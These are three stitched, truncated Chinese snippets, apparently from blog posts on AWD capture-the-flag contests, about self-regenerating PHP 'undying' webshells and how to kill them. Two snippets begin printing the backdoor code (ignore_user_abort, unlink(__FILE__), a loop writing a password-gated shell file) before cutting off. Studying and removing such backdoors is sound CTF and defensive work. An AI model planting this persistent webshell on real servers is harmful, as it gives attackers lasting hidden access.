数据来源 注意：一下写的东西是在p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量这篇文章的基础上进行的 演示案例： 防守-流量监控-实时获取访问数据包流量 攻击-权限维持-不死脚本后门生成及查杀 其他-恶意操作-搅屎棍发包回首掏共权限 准备-漏洞资源-漏洞资料库及脚本工具库 前提：开启awd项目，并在真实机使用Xshll 7连接虚拟机与 awd靶机的终端，上一篇文章有详

在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉. 什么是不死马 先说一下什么是不死马, 比如这种1 2 3 4 5 6 7 8 9 10set_time_limit(0); ignore_user_abort(1); unlink(__FILE__); while (1) { $content = "<?php error_reporti

不死马即内存马，它会写进进程里，并且无限地在指定目录中生成木马文件 这里以PHP不死马为例 测试代码： <?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.test.php';$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e